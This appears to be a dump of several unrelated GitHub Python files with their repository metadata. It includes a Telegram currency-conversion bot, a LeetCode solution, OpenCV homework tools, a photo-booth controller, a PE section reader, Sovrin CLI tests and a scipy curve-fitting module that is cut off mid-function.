def function_start(message: telebot.types.Message):
    """Handle /start: greet the user and point them to /help."""
    bot.send_message(message.chat.id, f'Добро пожаловать,\t {message.chat.username}!')
    bot.send_message(message.chat.id, 'Это бот для конвертации валют.')
    bot.send_message(message.chat.id, 'Для начала работы воспользуйтесь подсказками бота /help')
@bot.message_handler(commands=['help'])
def function_help(message: telebot.types.Message):
    """Handle /help: describe the expected "<from> <to> <amount>" input."""
    text = ('Для конвертации введите 3 параметра через пробел:\n'
            '<Ваша валюта>\n<В какую валюту хотите перевести>\n'
            '<Количество переводимой валюты>\n'
            '(пример: рубль евро 1000)\n'
            'Обратите внимание - название валюты пишется\nв именительном падеже единственного числа!\n'
            'Посмотреть список доступных валют: /values')
    bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['values'])
def values(message: telebot.types.Message):
    """Handle /values: reply with the list of supported currency names."""
    lines = ['Доступные валюты:']
    lines.extend(keys.keys())
    bot.reply_to(message, '\n'.join(lines))
@bot.message_handler(content_types=['text'])
def get_price(message: telebot.types.Message):
    """Parse "<from> <to> <amount>" from any text message and reply with the conversion."""
    try:
        values = message.text.split(' ')
        if len(values) != 3:
            raise APIException('Введите три параметра через пробел или\nвоспользуйтесь подсказками бота /help')
        val_origin, val_base, amount = values
        val_origin = val_origin.lower()
        val_base = val_base.lower()
        # total_base: rate for one unit — multiplied by amount below.
        total_base = CurrencyConverter.get_price(val_origin, val_base, amount)
    except APIException as e:
        # User input error: report it back to the chat.
        bot.reply_to(message, f'Ошибка пользователя.\n{e}')
    except Exception as e:
        # Anything else (network, parsing) is reported generically.
        bot.reply_to(message, f'Не удалось обработать команду\n{e}')
    else:
        text = f'{amount} {val_origin} = {round((total_base * float(amount)), 2)} {val_base}'
        bot.send_message(message.chat.id, text)
bot.polling(none_stop=True)
| TamaraRiga/Control-project-18.6 | app.py | app.py | py | 2,545 | python | ru | code | 0 | github-code | 6 | [
{
"api_name": "telebot.TeleBot",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "config.TOKEN",
"line_number": 6,
"usage_type": "argument"
},
{
"api_name": "telebot.types",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "telebot.types",
... |
43974550604 | import re
from collections import defaultdict
from typing import List
class Solution:
    def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:
        """Return the most frequent word in *paragraph* that is not banned.

        Words are compared case-insensitively; *banned* entries are assumed
        lowercase. Returns "" when no countable word exists.
        """
        # Set membership is O(1); the old code scanned the banned list per word.
        banned_set = set(banned)
        counts = {}
        # Split on the same delimiter class as before; empty tokens appear
        # between adjacent delimiters and are skipped.
        for token in re.split(r"[! ?.,;']", paragraph):
            if not token:
                continue
            word = token.lower()
            if word in banned_set:
                continue
            # Plain dict counting — the original used defaultdict() with no
            # factory, which behaves as a plain dict anyway.
            counts[word] = counts.get(word, 0) + 1
        # max() keeps the first maximum in insertion order, matching the
        # original strict ">" scan.
        return max(counts, key=counts.get) if counts else ""
{
"api_name": "typing.List",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "collections.defaultdict",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 9,
"usage_type": "call"
}
] |
#!/usr/bin/env python
from lxml import html
import wikipedia
# Read the movie list (one title per line) and look at the first entry.
with open('movies.txt', 'r') as f:
    movies = f.read().strip().split('\n')
m = movies[0]
# BUG FIX: the page HTML was previously assigned to the name `html`,
# shadowing the imported lxml.html module, so the subsequent
# html.fromstring(...) call could never work.
page_html = wikipedia.page(m).html()
tree = html.fromstring(page_html)
# NOTE(review): the XPath '//' looks unfinished — it selects nothing
# meaningful; confirm the intended director selector.
director = tree.xpath('//')
| luster/is-pepsi-okay | script/scrape.py | scrape.py | py | 245 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "lxml.html",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "wikipedia.page",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "lxml.html.fromstring",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lxml.html",
"line_n... |
71802647227 | import pefile
import sys
import os
import json
def locate_data_sections(pe):
    """Collect name/address/size info for every '.text' section of *pe*.

    Despite the name, this filters the code (.text) section; PE section
    names are padded to 8 bytes, hence the trailing NULs in the match.
    """
    wanted = b'.text\x00\x00\x00'
    return [
        {
            'name': section.Name,
            'virtual_address': hex(section.VirtualAddress),
            'virtual_size': hex(section.Misc_VirtualSize),
            'size': section.SizeOfRawData,
        }
        for section in pe.sections
        if section.Name == wanted
    ]
# argv[1] is either a directory of PE files or a single PE file.
directory = sys.argv[1]
output = {}
try:
    entries = os.listdir(directory)
    for entry in entries:
        pe = pefile.PE(os.path.join(directory, entry))
        output[entry] = locate_data_sections(pe)
except OSError:
    # Not a listable directory — treat argv[1] as a single PE file.
    # (The old bare `except:` also silently swallowed pefile parse errors
    # raised mid-loop; those now propagate.)
    pe = pefile.PE(sys.argv[1])
    output[sys.argv[1]] = locate_data_sections(pe)
print(output)
| luiz-cesar/CDadosSeg | T2/Parte2/exe_analysis.py | exe_analysis.py | py | 715 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.argv",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pefile.PE",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": ... |
716738610 | import pytest
import json
from sovrin_client.test.cli.constants import INVALID_SYNTAX
from sovrin_client.test.cli.helper import createUuidIdentifier, addNym
attrib_name = 'dateOfBirth'
ATTRIBUTE_ADDED = 'Attribute added for nym {valid_dest}'
RETURNED_DATA = ['Found attribute', attrib_name, 'dayOfMonth', 'year', 'month']
ATTR_NOT_FOUND = 'Attr not found'
@pytest.fixture(scope="module")
def send_attrib(be, do, poolNodesStarted, trusteeCli):
    """Create a nym, attach a dateOfBirth ATTRIB to it, and return the
    identifiers plus raw payload for the GET_ATTR tests to reuse.

    ``invalid_dest`` is a fresh identifier that never receives an attribute.
    """
    valid_identifier = createUuidIdentifier()
    invalid_identifier = createUuidIdentifier()
    addNym(be, do, trusteeCli, idr=valid_identifier)
    parameters = {
        'attrib_name': attrib_name,
        'valid_dest': valid_identifier,
        'invalid_dest': invalid_identifier,
        'raw': json.dumps({
            attrib_name: {
                'dayOfMonth': 23,
                'year': 1984,
                'month': 5
            }
        })
    }
    be(trusteeCli)
    do('send ATTRIB dest={valid_dest} raw={raw}',
       mapper=parameters, expect=ATTRIBUTE_ADDED, within=2)
    return parameters
def test_send_get_attr_succeeds_for_existing_uuid_dest(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """GET_ATTR on the nym that owns the attribute returns its data."""
    be(trusteeCli)
    do('send GET_ATTR dest={valid_dest} raw={attrib_name}',
       mapper=send_attrib, expect=RETURNED_DATA, within=2)
def test_send_get_attr_fails_for_invalid_uuid_dest(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """GET_ATTR on a nym without that attribute reports 'Attr not found'."""
    do('send GET_ATTR dest={invalid_dest} raw={attrib_name}',
       mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
def test_send_get_attr_fails_for_nonexistent_uuid_dest(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """A malformed dest is rejected by the CLI parser with INVALID_SYNTAX."""
    with pytest.raises(AssertionError) as excinfo:
        do('send GET_ATTR dest=this_is_not_valid raw={attrib_name}',
           mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
    assert(INVALID_SYNTAX in str(excinfo.value))
def test_send_get_attr_fails_for_invalid_attrib(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """Requesting an attribute name that was never set yields 'Attr not found'."""
    do('send GET_ATTR dest={valid_dest} raw=badname',
       mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
def test_send_get_attr_fails_with_missing_dest(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """Omitting dest= makes the CLI reject the command with INVALID_SYNTAX."""
    with pytest.raises(AssertionError) as excinfo:
        do('send GET_ATTR raw={attrib_name}',
           mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
    assert(INVALID_SYNTAX in str(excinfo.value))
def test_send_get_attr_fails_with_missing_attrib(
        be, do, poolNodesStarted, trusteeCli, send_attrib):
    """Omitting raw= makes the CLI reject the command with INVALID_SYNTAX."""
    with pytest.raises(AssertionError) as excinfo:
        do('send GET_ATTR dest={valid_dest}',
           mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
    assert(INVALID_SYNTAX in str(excinfo.value))
| hyperledger-archives/indy-client | sovrin_client/test/cli/test_send_get_attr.py | test_send_get_attr.py | py | 2,791 | python | en | code | 18 | github-code | 6 | [
{
"api_name": "sovrin_client.test.cli.helper.createUuidIdentifier",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sovrin_client.test.cli.helper.createUuidIdentifier",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sovrin_client.test.cli.helper.addNym",
... |
28978147496 | import tkinter as tk
import pygubu
import cv2
import copy
import numpy as np
class Application:
    """Pygubu/Tkinter GUI wiring OpenCV demos for homework problems 1-4."""
    def __init__(self, master):
        self.master = master
        #create builder
        self.builder = builder = pygubu.Builder()
        #load ui file
        builder.add_from_file('hw1.ui')
        #create a widget
        self.mainwindow = builder.get_object('window', master)
        #connect callback
        builder.connect_callbacks(self)
    def btn_quit_on_click(self):
        """Exit the Tk main loop."""
        self.master.quit()
    #button for problem 1.1
    def btn_11_on_click(self):
        """1.1: show dog.bmp and print its height/width."""
        #add your code here
        img = cv2.imread('dog.bmp')
        height, width, channels = img.shape
        cv2.imshow('img1.1',img)
        print('Height = '+str(height))
        print('Width = '+str(width))
        cv2.waitKey(0)
    #button for problem 1.2
    def btn_12_on_click(self):
        """1.2: cyclically shift the three colour channels of color.png per pixel."""
        #add your code here
        img = cv2.imread('color.png')
        '''img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        cv2.imshow('img1.2',img)'''
        for x in range(0,len(img)):
            for y in range(0,len(img[x])):
                # (B, G, R) -> (G, R, B)
                a = img[x][y][0]
                b = img[x][y][1]
                c = img[x][y][2]
                img[x][y][0] = b
                img[x][y][1] = c
                img[x][y][2] = a
        cv2.imshow('img1.2',img)
        cv2.waitKey(0)
    #button for problem 1.3
    def btn_13_on_click(self):
        """1.3: horizontally flip dog.bmp via explicit pixel copying."""
        #add your code here
        img = cv2.imread('dog.bmp')
        height, width, channels = img.shape
        new_img = copy.deepcopy(img)
        for x in range(height):
            for y in range(width):
                new_img[x][width-1-y] = img[x][y]
        cv2.imshow('img1.3',new_img)
        cv2.waitKey(0)
    #button for problem 1.4
    def btn_14_on_click(self):
        """1.4: blend the image with its mirror; ratio driven by a trackbar."""
        def callback(x):
            # Required by createTrackbar; positions are polled in the loop.
            pass
        #add your code here
        cv2.namedWindow('img1.4')
        cv2.createTrackbar('BLEND','img1.4',0,100,callback)
        cv2.createTrackbar('OFF','img1.4',0,1,callback)
        img = cv2.imread('dog.bmp')
        height, width, channels = img.shape
        new_img = copy.deepcopy(img)
        for x in range(height):
            for y in range(width):
                new_img[x][width-1-y] = img[x][y]
        while(True):
            # The OFF trackbar acts as an exit switch for the preview loop.
            off = cv2.getTrackbarPos('OFF','img1.4')
            if(off == 1):
                break
            blend = cv2.getTrackbarPos('BLEND','img1.4')
            blend = blend/100
            img_mix = cv2.addWeighted(img, (1-blend), new_img, blend, 0)
            cv2.imshow('img1.4',img_mix)
            cv2.waitKey(1)
    #button for problem 2.1
    def btn_21_on_click(self):
        """2.1: grayscale eye.jpg and run Canny edge detection on it."""
        #add your code here
        img = cv2.imread('eye.jpg')
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        cv2.imshow('gray_img2.1', img)
        detect_img = cv2.Canny(img, 150, 300)
        cv2.imshow('detect_img2.1', detect_img)
        cv2.waitKey(0)
    #button for problem 2.2
    def btn_22_on_click(self):
        """2.2: Hough circle detection on eye.jpg, drawn over its Canny edges."""
        #add your code here
        img = cv2.imread('eye.jpg')
        cimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        draw_img = np.ones(img.shape, dtype=np.uint8)
        # HoughCircles has Canny detector itself
        circles = cv2.HoughCircles(cimg, cv2.HOUGH_GRADIENT, 1, 20,param1=300,param2=40,minRadius=10,maxRadius=50)
        circles = np.uint16(np.around(circles))
        for i in circles[0,:]:
            # draw the outer circle
            cv2.circle(draw_img,(i[0],i[1]),i[2],(0,0,255),2)
            # draw the center of the circle
            #cv2.circle(fimg,(i[0],i[1]),2,(0,0,255),3)
        # get Canny result to draw (has the same Canny parameter with HoughCircles)
        fimg = cv2.Canny(img,150,300)
        fimg = cv2.cvtColor(fimg, cv2.COLOR_GRAY2RGB)
        # combine draw and Canny result
        mix_draw = cv2.addWeighted(draw_img, 1, fimg, 1, 0)
        cv2.imshow('detected circles',mix_draw)
        cv2.waitKey(0)
    #button for problem 2.3
    def btn_23_on_click(self):
        """2.3: not implemented yet."""
        #add your code here
        cv2.waitKey(0)
    #button for problem 3
    def btn_3_on_click(self):
        """3: not implemented yet."""
        #add your code here
        cv2.waitKey(0)
    #button for problem 4.1
    def btn_41_on_click(self):
        """4.1: global threshold on shoes.jpg, then Gaussian + median smoothing."""
        #add your code here
        img = cv2.imread('shoes.jpg')
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        # NOTE(review): cv2.threshold's result is discarded here — the
        # thresholded image is its second return value; confirm intent.
        cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
        #cv2.imshow('img4.1_1',img)
        blur = cv2.GaussianBlur(img,(5,5),0)
        #cv2.imshow('img4.1_2',blur)
        median = cv2.medianBlur(blur,5)
        cv2.imshow('img4.1',median)
        cv2.waitKey(0)
    #button for problem 4.2
    def btn_42_on_click(self):
        """4.2: adaptive (local) threshold on shoes.jpg, then smoothing filters."""
        #add your code here
        img = cv2.imread('shoes.jpg')
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)
        cv2.imshow('img4.2_local',img)
        blur = cv2.GaussianBlur(img,(5,5),0)
        cv2.imshow('img4.2_Gussian_smooth',blur)
        median = cv2.medianBlur(blur,5)
        cv2.imshow('img4.2_median_filter',median)
if __name__ == '__main__':
    # Build the Tk root, attach the pygubu application, and start the loop.
    root = tk.Tk()
    app = Application(root)
    root.mainloop()
| F74036378/IMAGE_DEAL1 | hw1.py | hw1.py | py | 4,397 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pygubu.Builder",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number":... |
40333382628 | from loguru import logger
from gpiozero import Button
from fabiotobox.camera import Camera
from fabiotobox.diaporama import Diaporama
from fabiotobox.photohandler import PhotoHandler
from fabiotobox.tumblr import Tumblr
from enum import IntEnum
import pendulum
import time
SCREENSAVER_DELAY = 1
class PhotoFormat(IntEnum):
    """Output layout of a composed photo."""
    PHOTOBOX = 0
    POLAROID = 1
class Mode(IntEnum):
    """Current state of the main loop: shooting vs. screensaver slideshow."""
    PHOTOBOX = 0
    DIAPORAMA = 1
class Fabiotobox:
    """Photo-booth controller: GPIO shoot button, camera, diaporama
    screensaver and optional Tumblr upload."""
    def __init__(
        self,
        camera: Camera,
        photo_handler: PhotoHandler,
        diaporama: Diaporama,
        tumblr: Tumblr,
        shoot_button_port: int,
        effect_button_port: int = None,
        format_button_port: int = None,
        event_title: str = "Test",
    ):
        self.shoot_button = Button(shoot_button_port)
        # Effect/format buttons are optional hardware.
        if effect_button_port:
            self.effect_button = Button(effect_button_port)
        if format_button_port:
            self.format_button = Button(format_button_port)
        self.camera = camera
        self.photo_handler = photo_handler
        self.diaporama = diaporama
        self.tumblr = tumblr
        self.photo_format = PhotoFormat.POLAROID
        self.event_title = event_title
        self.mode = Mode.PHOTOBOX
        self.diaporama_countdown = pendulum.now("Europe/Paris")
    def run(self):
        """Main loop: dispatch to photobox or diaporama handling forever."""
        # Holding the shoot button shuts the camera down.
        self.shoot_button.when_held = self.camera.end
        self.camera.start_preview()
        self.reset_diaporama_countdown()
        while True:
            # After SCREENSAVER_DELAY minutes of inactivity, show the diaporama.
            if self.is_diaporama_countdown_reached():
                self.mode = Mode.DIAPORAMA
            if self.mode is Mode.PHOTOBOX:
                self.run_photobox()
            else:
                self.run_diaporama()
    def run_photobox(self):
        """One photobox iteration: shoot on button press, display and upload."""
        if self.shoot_button.is_pressed:
            logger.debug("Button pressed for a photo")
            photo = self.shoot_photo()
            self.camera.display_image(photo)
            time.sleep(3)  # leave the shot on screen for review
            self.camera.undisplay_image()
            if self.tumblr is not None:
                logger.info("Sending {} to tumblr".format(photo))
                self.tumblr.post_photo(photo, self.event_title, [])
            self.reset_diaporama_countdown()
    def run_diaporama(self):
        """One diaporama iteration: exit on button press, else rotate pictures."""
        if self.shoot_button.is_pressed:
            logger.debug("Button pressed for exiting diaporama")
            self.mode = Mode.PHOTOBOX
            self.camera.undisplay_image()
            self.reset_diaporama_countdown()
            time.sleep(1) # prevent the press from also being caught by the photobox loop
        else:
            if self.is_diaporama_countdown_reached():
                logger.info("dirs : {}".format(len(self.diaporama.dirs)))
                new_picture = self.diaporama.pick_photo()
                # Picture can be None: then just reset the countdown.
                if new_picture is not None:
                    self.camera.display_image(new_picture)
                self.reset_diaporama_countdown()
    def shoot_photo(self) -> str:
        """Capture and compose a photo; return the composed file's path."""
        if self.photo_format == PhotoFormat.POLAROID:
            pictures = self.camera.shoot(1)
            photo = self.photo_handler.make_polaroid(pictures[0])
        else:
            # Photostrip layout: three consecutive shots.
            pictures = self.camera.shoot(3)
            photo = self.photo_handler.make_photostrip(pictures)
        return photo
    def reset_diaporama_countdown(self):
        """Re-arm the inactivity deadline SCREENSAVER_DELAY minutes from now."""
        self.diaporama_countdown = pendulum.now("Europe/Paris").add(
            minutes=SCREENSAVER_DELAY
        )
    def is_diaporama_countdown_reached(self) -> bool:
        """True once the inactivity deadline has passed."""
        return self.diaporama_countdown < pendulum.now("Europe/Paris")
| fabiolab/photobox | fabiotobox/fabiotobox.py | fabiotobox.py | py | 3,580 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "enum.IntEnum",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "enum.IntEnum",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "fabiotobox.camera.Camera",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "fabiotobox.photoha... |
40504216527 | import os
import subprocess
import tempfile
import nbformat
import pytest
IGNORE_NOTEBOOKS: list[str] = [
"12_ResDMD.ipynb",
"12_koopman_mpc.ipynb",
"koopman_mpc.ipynb",
]
def _notebook_run(path):
    """Execute a notebook via nbconvert and collect output. Returns the parsed notebook object
    and the execution errors.

    Source:
    https://blog.thedataincubator.com/2016/06/testing-jupyter-notebooks/
    """
    dirname, _ = os.path.split(path)
    os.chdir(dirname)  # run relative to the notebook's own directory
    # NOTE(review): reopening a NamedTemporaryFile by name is not portable to
    # Windows — confirm this test suite only targets POSIX.
    with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
        args = [
            "jupyter",
            "nbconvert",
            "--to",
            "notebook",
            "--execute",
            "--ExecutePreprocessor.timeout=400",
            "--output",
            fout.name,
            path,
        ]
        subprocess.check_call(args)
        fout.seek(0)
        nb = nbformat.read(fout, nbformat.current_nbformat)
        # Collect every error output of every executed cell.
        errors = [
            output
            for cell in nb.cells
            if "outputs" in cell
            for output in cell["outputs"]
            if output.output_type == "error"
        ]
    return nb, errors
def _find_all_notebooks_to_run():
    """Collect every tutorial notebook path, skipping the ignore list and
    .ipynb_checkpoints copies."""
    from datafold import __path__ as datafold_path

    assert len(datafold_path) == 1

    import pathlib

    tutorials_path = pathlib.Path(datafold_path[0]).parent / "tutorials"
    assert tutorials_path.is_dir()

    selected = []
    for candidate in tutorials_path.rglob("*.ipynb"):
        if ".ipynb_checkpoints" in str(candidate):
            continue
        if candidate.name in IGNORE_NOTEBOOKS:
            continue
        assert candidate.is_file()
        selected.append(candidate)
    return selected
@pytest.mark.parametrize("nb_path", _find_all_notebooks_to_run())
def test_notebooks(nb_path):
    """Execute the notebook end-to-end and fail on any cell error."""
    _, errors = _notebook_run(nb_path)
    assert not errors
| datafold-dev/datafold | tutorials/tests/test_notebooks.py | test_notebooks.py | py | 1,932 | python | en | code | 13 | github-code | 6 | [
{
"api_name": "os.path.split",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "tempfile.NamedTemporaryFile",
... |
9064742045 | from utils import readEdgeList, split_between_last_char
import numpy as np
import time
from ResultWritter import ResultWritter
import os
class KTupleFeatureGenerator:
    """Drives the external ./run and ./runold binaries to compute k-tuple
    graphlet features for edge-list files."""
    def __init__(self, path, k = 5, sample_times = 100, thread_num = 40):
        # path: edge-list file ("<prefix>.edges"); k: max tuple size;
        # sample_times / thread_num are forwarded to the native binaries.
        self.path = path
        self.k = k
        self.sample_times = sample_times
        self.thread_num = thread_num
    def generate_k_tuple_feature(self, path):
        """Run ./run once for the full k."""
        # NOTE(review): os.system builds a shell command by string
        # concatenation — a path with spaces or shell metacharacters breaks
        # or injects; consider subprocess.run([...]).
        os.system('./run ' + path + " " + str(self.k) + " " + str(self.sample_times) + " " + str(self.thread_num))
    def generate_k_tuple_feature_old(self, path):
        """Run ./runold once per tuple size from 3 up to k (inclusive)."""
        for i in range(3, self.k + 1):
            os.system('./runold ' + path + " " + str(i) + " " + str(self.sample_times) + " " + str(self.thread_num))
    def generateDataFeature(self):
        """Process every *.edges file inside the directory named after
        self.path with its extension stripped, using the old binary."""
        print(self.path)
        # self.generate_k_tuple_feature(self.path)
        prefix, _ = split_between_last_char(self.path, '.')
        # prefix += suffix
        print(prefix)
        if os.path.exists(prefix):
            filenames = os.listdir(prefix)
            filenames = [(prefix + "/" + name) for name in filenames]
            # NOTE(review): fileNames is never used — dead variable.
            fileNames = []
            for name in filenames:
                if name.split('.')[-1] == "edges":
                    print(name)
                    self.generate_k_tuple_feature_old(name)
if __name__ == '__main__':
    # Smoke run on the artist graph: invoke the old binary on the file
    # itself, then sweep the per-graph directory of .edges files.
    path = "../data/artist_edges.edges"
    ktuple = KTupleFeatureGenerator(path = path)
    ktuple.generate_k_tuple_feature_old(ktuple.path)
    ktuple.generateDataFeature()
| anonydeepgraphlet/DeepGraphlet | src/k_tuple_feature_generator.py | k_tuple_feature_generator.py | py | 1,538 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.system",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils.split_between_last_char",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
... |
23731980444 | from collections import abc
from typing import Any, Callable, Dict, List, Optional, Union
def remove_nulls(data: Union[List, Dict],
                 value_filter: Optional[Callable[[Any], bool]] = None) -> Union[List, Dict]:
    """Recursively drop filtered values from a nested list/dict structure.

    Without a *value_filter*, entries whose value is ``None`` are removed.
    Otherwise *value_filter* receives each value; a truthy return marks the
    entry for removal.

    Args:
        data: list/tuple or mapping to clean (strings are not containers here).
        value_filter: predicate selecting values to drop; defaults to
            "is None".

    Raises:
        TypeError: when *data* is neither a mapping nor a list/tuple.

    Returns:
        A filtered copy with the same overall structure as *data*.
    """
    sequence_types = (list, tuple)  # 'str' is deliberately excluded
    mapping_types = (abc.Mapping,)
    nested_types = (*mapping_types, *sequence_types)

    if value_filter is None:
        value_filter = lambda v: v is None

    if isinstance(data, sequence_types):
        kept = [item for item in data if not value_filter(item)]
        return [
            remove_nulls(item, value_filter) if isinstance(item, nested_types) else item
            for item in kept
        ]
    if isinstance(data, mapping_types):
        def descend(value):
            # Recurse into containers; scalars pass through untouched.
            return remove_nulls(value, value_filter) if isinstance(value, nested_types) else value
        return {k: descend(v) for k, v in data.items() if not value_filter(v)}
    raise TypeError(f"Unsupported type '{type(data)}': {data!r}")
# data = {
# "field_1":None,
# "field_2":"b",
# "field_3":{"z":"z","y":"y","x":None},
# "field_4":[{"z":"z","y":"y","x":None}, None, {"z":"z","y":None, "x":{"a":None,"b":"b"}}]
# }
# print(remove_nulls(data))
| rylativity/python-utils | dataprep.py | dataprep.py | py | 2,193 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.Union",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number"... |
73954150588 | import cv2
import sys
from emot import emo_det

# Haar cascade describing frontal faces; file ships alongside this script.
cascPath = "webcam.xml"
faceCascade = cv2.CascadeClassifier(cascPath)
font = cv2.FONT_HERSHEY_SIMPLEX

# Capture from the default webcam (device 0).
video_capture = cv2.VideoCapture(0)

while True:
    # Capture frame-by-frame; stop cleanly if the camera yields no frame
    # (unplugged device, end of stream) instead of crashing in cvtColor
    # on a None frame.
    ret, frame = video_capture.read()
    if not ret:
        break

    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = faceCascade.detectMultiScale(
        gray,
        scaleFactor=1.1,
        minNeighbors=5,
        minSize=(30, 30),
        flags=cv2.CASCADE_SCALE_IMAGE
    )

    # Draw a rectangle around each face and overlay the dominant emotion
    # and its score (in %).
    for (x, y, w, h) in faces:
        dom_emotion, dom_score = emo_det(frame)
        cv2.putText(frame, dom_emotion+" "+str(dom_score*100)+'%', (x, y), font, 1, (0, 255, 0), 2)
        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)

    # Display the resulting frame; press 'q' to quit.
    cv2.imshow('Video', frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
| allansuresh/face-emo-detect | det.py | det.py | py | 1,087 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.CascadeClassifier",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2... |
34473798674 | import numpy as np
from scipy.optimize import curve_fit
import sys
def fit_DD(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
    """
    Fit P_DD(k, mu, lambda) with a given function:
      P_DD(k, mu, lambda) = P_DD0(k, mu)*f(lambda, *params)

    Args:
      d (dict): lambda data returned by load_lambda()
      ik (int): k index
      imu (int): mu index
      f: fitting function f(lambda, *params)
      fit (dict): dictionary for results (created if None)
      p0 (list): initial guess for *params (defaults to zeros)
      ilambda_max (int): use only the first ilambda_max lambda bins

    Returns:
      fit (dict)
      fit['lambda'] (array): lambda bins actually used (NaNs removed)
      fit['PDD_amp']: amplitude P_DD0(k, mu)
      fit['PDD_params'] (array): best fitting *params
      fit['PDD'] (array): best fitting PDD[ilambda]
      None if the fit did not converge
    """
    x = d['lambda'][:ilambda_max]
    # Normalise by the lambda=0 amplitude so f itself is fitted directly
    y = d['summary']['PDD'][ik, imu, :ilambda_max]/d['summary']['PDD0'][ik, imu]

    # remove nans
    idx = np.isfinite(y)
    x = x[idx]
    y = y[idx]

    # initial guess: one zero per free parameter of f (first arg is lambda)
    if p0 is None:
        p0 = [0, ]*(f.__code__.co_argcount - 1)

    # fitting (warn on non-convergence, consistent with fit_DU/fit_UU)
    try:
        popt, pcov = curve_fit(f, x, y, p0=p0)
    except RuntimeError:
        sys.stderr.write('Warning: unable to fit DD with %s; ik=%d imu=%d\n' %
                         (f.__name__, ik, imu))
        return None

    if fit is None:
        fit = {}

    fit['PDD_amp'] = d['summary']['PDD0'][ik, imu]
    fit['PDD_params'] = popt
    fit['lambda'] = x
    fit['PDD'] = d['summary']['PDD0'][ik, imu]*f(x, *popt)

    return fit
def fit_DU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
    """
    Fit P_DU(k, mu, lambda) with a given function:
      P_DU(k, mu, lambda) = A*lambda*f(lambda, *params)

    Args:
      d (dict): lambda data returned by load_lambda()
      ik (int): k index
      imu (int): mu index
      f (func): fitting function f(lambda, *params)
      fit (dict): dictionary for results (created if None)
      p0 (list): initial guess for *params (amplitude A is prepended)
      ilambda_max (int): use only the first ilambda_max lambda bins

    Returns:
      fit (dict) with keys 'PDU_amp', 'PDU_params', 'lambda', 'PDU',
      or None if the fit did not converge
    """
    def ff(x, A, *params):
        # model: linear amplitude times the shape function f
        return A*x*f(x, *params)

    x = d['lambda'][:ilambda_max]
    y = d['summary']['PDU'][ik, imu, :ilambda_max]

    # remove nans
    idx = np.isfinite(y)
    x = x[idx]
    y = y[idx]

    # initial guess; p0[0] is the amplitude A
    if p0 is None:
        p0 = [0, ]*(f.__code__.co_argcount)
    else:
        p0 = [0, ] + p0

    # amplitude guess from a representative data point; the index is
    # clamped so arrays with fewer than 11 finite points no longer raise
    # IndexError, and x == 0 no longer divides by zero
    i0 = min(10, len(x) - 1)
    if i0 >= 0 and x[i0] != 0:
        p0[0] = y[i0]/x[i0]

    # fitting
    try:
        popt, pcov = curve_fit(ff, x, y, p0=p0)
    except RuntimeError:
        sys.stderr.write('Warning: unable to fit DU with %s; ik=%d imu=%d\n' %
